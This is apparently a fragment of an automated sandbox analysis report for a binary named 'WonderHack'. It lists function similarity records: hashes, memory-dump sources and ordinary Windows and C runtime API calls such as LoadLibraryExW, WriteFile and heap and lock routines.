                                                                                                                                                                                                                                                                          • Instruction ID: 16268a4d98560addcad5b3924d488a29237a28da832a10044f9f7982ffa9aa2f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80c2a5f3b6dc901653dc783c2414e50e2c0e34a00814ea4153bc059e75d3149f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF01753620B2115DA6253AB9BC95BAF2B44DB557B4F30063BF531550F3EF924D01E650
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 00CB2945
                                                                                                                                                                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 00CB2BBE
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                          • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                                                          • Opcode ID: c8d4beee907e8170ada37494431021fa945333dd8470a078108e8985c8686446
                                                                                                                                                                                                                                                                          • Instruction ID: 81fbed23a90a42b7728e09d652b2356f91e1b0d6e0d718a4227d4c3a0cb83789
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8d4beee907e8170ada37494431021fa945333dd8470a078108e8985c8686446
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34B18931C00209EFCF29DFA4D881AEEBBB5FF18310F54455AE8256B212C735DA52DBA1
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,0BDF5ED4,?,?,00000000,00CC3374,000000FF,?,00CACAFD,00CAC9E4,?,00CACB99,00000000), ref: 00CACA71
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CACA83
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,00CC3374,000000FF,?,00CACAFD,00CAC9E4,?,00CACB99,00000000), ref: 00CACAA5
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                          • Opcode ID: 849f90581f4b6ae1d7a4c255533e66c7c4c04dcbd33a241b56b59775bcad8077
                                                                                                                                                                                                                                                                          • Instruction ID: 0945756f8fb3b59626037b0620e5d3766089cdd3c50205cdfd92706916ec2fe0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 849f90581f4b6ae1d7a4c255533e66c7c4c04dcbd33a241b56b59775bcad8077
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC01673150465AAFDB11DF94DC09FBEBBB8FB05714F044539F826A22E0DB74AD00CA90
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00CB4952
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00CB4A1B
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00CB4A82
                                                                                                                                                                                                                                                                            • Part of subcall function 00CB31C1: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CA22A9,?,?,00C93E32,00001000,?,00C93D7A), ref: 00CB31F3
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00CB4A95
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00CB4AA2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1423051803-0
                                                                                                                                                                                                                                                                          • Opcode ID: dd72112742775c50dd7fdfab8af549708399a61af1b39a70069cbf04af6302ef
                                                                                                                                                                                                                                                                          • Instruction ID: 084d6ef5fcf4fa903f3d648275981199b77317045209f5dc7469928d26e230c3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd72112742775c50dd7fdfab8af549708399a61af1b39a70069cbf04af6302ef
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE51CE72644207AFEF289FA58C85EFB3BADEF84710F194528FD14D6142EB30DE10A664
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00CA5C93
                                                                                                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(?,?,?,00CA5C5C,?,00000000,?,00C9B93C,?,?,00C9D94E), ref: 00CA5CB2
                                                                                                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00CA5C5C,?,00000000,?,00C9B93C,?,?,00C9D94E), ref: 00CA5CE0
                                                                                                                                                                                                                                                                          • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00CA5C5C,?,00000000,?,00C9B93C,?,?,00C9D94E), ref: 00CA5D3B
                                                                                                                                                                                                                                                                          • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00CA5C5C,?,00000000,?,00C9B93C,?,?,00C9D94E), ref: 00CA5D52
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 66001078-0
                                                                                                                                                                                                                                                                          • Opcode ID: 6ab3ec893ad4a3cd477eebc6971b9c9ee9778856840928466a047a899c0b406d
                                                                                                                                                                                                                                                                          • Instruction ID: 760ee6a283a87abb48f606f530e65e698fadcdc7daebdc6234ae0a0269dd4001
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ab3ec893ad4a3cd477eebc6971b9c9ee9778856840928466a047a899c0b406d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1413C75900F0BDFCB20DF65D688AAAB7F4FF06318B50892AD466D7650D730EA85CB50
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00CA295D
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00CA2968
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00CA29D6
                                                                                                                                                                                                                                                                            • Part of subcall function 00CA285F: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00CA2877
                                                                                                                                                                                                                                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 00CA2983
                                                                                                                                                                                                                                                                          • _Yarn.LIBCPMT ref: 00CA2999
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1088826258-0
                                                                                                                                                                                                                                                                          • Opcode ID: f187d5fb47a2de2ade0712da6309badfcd6dbab3dbee40a211992b1d8c9e1b84
                                                                                                                                                                                                                                                                          • Instruction ID: 956188fe66ed6912929ccf440cc25b8b8e44e64e4a49d7e921db6e7a66d633a6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f187d5fb47a2de2ade0712da6309badfcd6dbab3dbee40a211992b1d8c9e1b84
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8018F75A016229BCB06EF24D845B7E7BB2FF86758B18401DF81197391CF34AE02EB95
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00CBDDCD,00000000,?,00CD21B8,?,?,?,00CBDD04,00000004,InitializeCriticalSectionEx,00CC808C,00CC8094), ref: 00CBDD3E
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00CBDDCD,00000000,?,00CD21B8,?,?,?,00CBDD04,00000004,InitializeCriticalSectionEx,00CC808C,00CC8094,00000000,?,00CB2E6C), ref: 00CBDD48
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00CBDD70
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                                          • Opcode ID: e983bf86b4b9245f0bf0cd7b85a8838826739da621f19149f5795613feb8ca25
                                                                                                                                                                                                                                                                          • Instruction ID: 6ed15c957997e20fb58fe9c7a97230ee9d2186fcedca4a0b6c71a0dad968491a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e983bf86b4b9245f0bf0cd7b85a8838826739da621f19149f5795613feb8ca25
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34E04F70380605B7EB111B71EC06FAD3B54AF20B41F144570F94EE80E1FB72A9209994
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNEL32(0BDF5ED4,00000000,00000000,?), ref: 00CBB13A
                                                                                                                                                                                                                                                                            • Part of subcall function 00CB32D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CB4A78,?,00000000,-00000008), ref: 00CB3332
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00CBB38C
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00CBB3D2
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00CBB475
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2112829910-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8d7c6606defa84f09475a25a421d05c5945c8dbd13664f12654422df8254fa04
                                                                                                                                                                                                                                                                          • Instruction ID: eeb3c62fad7615f9a22a415389832958dc9136c7102e91aa29c0de28da6c94cb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d7c6606defa84f09475a25a421d05c5945c8dbd13664f12654422df8254fa04
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57D179B5D012489FCB15CFA8D890AEDBBB4FF49304F28412AE466EB252D770AD42CF50
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AdjustPointer
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2617fc9c27c156e4c1ef752bca1ac778108844306f2cb599730e1a8cc4f7a2f6
                                                                                                                                                                                                                                                                          • Instruction ID: 7f91b2d7799428d179dceba928d2a92b58d5b4092e08265aafb67d176b5565cf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2617fc9c27c156e4c1ef752bca1ac778108844306f2cb599730e1a8cc4f7a2f6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77510172A01206AFDB288F55D840BEAB3B4FF45714F15052EFC218B2A1E731EE44DB90
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00CB32D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CB4A78,?,00000000,-00000008), ref: 00CB3332
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00CB8F67
                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00CB8F6E
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00CB8FA8
                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00CB8FAF
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1913693674-0
                                                                                                                                                                                                                                                                          • Opcode ID: 3b4889989c7e3f0d14fc68726bfc6eb1cbb01dda3c33cfce60bded43b1224da3
                                                                                                                                                                                                                                                                          • Instruction ID: fd60558959eada20932296fcfb284893c1e241f90453f7bc61be7f857e259db1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b4889989c7e3f0d14fc68726bfc6eb1cbb01dda3c33cfce60bded43b1224da3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E921A771604216AFDB10AFA2D8859BBB7AEFF15364B108519F82997190DF30EE04DFA0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 4c510a800906c06031ebd754848f6284b5059810e4a930456c61226414f3b4ca
                                                                                                                                                                                                                                                                          • Instruction ID: ca86ea10f85606cb7b42c6cc43ae820441b0fd665492ae6e7966b5c670b4c97a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c510a800906c06031ebd754848f6284b5059810e4a930456c61226414f3b4ca
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD218731200217AFDB10AF66DC86DAA77ADFF4336CB104524F926D7691E734ED109BA0
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00CBA301
                                                                                                                                                                                                                                                                            • Part of subcall function 00CB32D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CB4A78,?,00000000,-00000008), ref: 00CB3332
                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CBA339
                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CBA359
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 158306478-0
                                                                                                                                                                                                                                                                          • Opcode ID: a50271fc9c27b77633ee039633b90e4aca2c9a73d053798de6565b381c0ade01
                                                                                                                                                                                                                                                                          • Instruction ID: e11625725e499e9452c65c99758fb5bb229f931b73f56c6c125f4cb55ada83c0
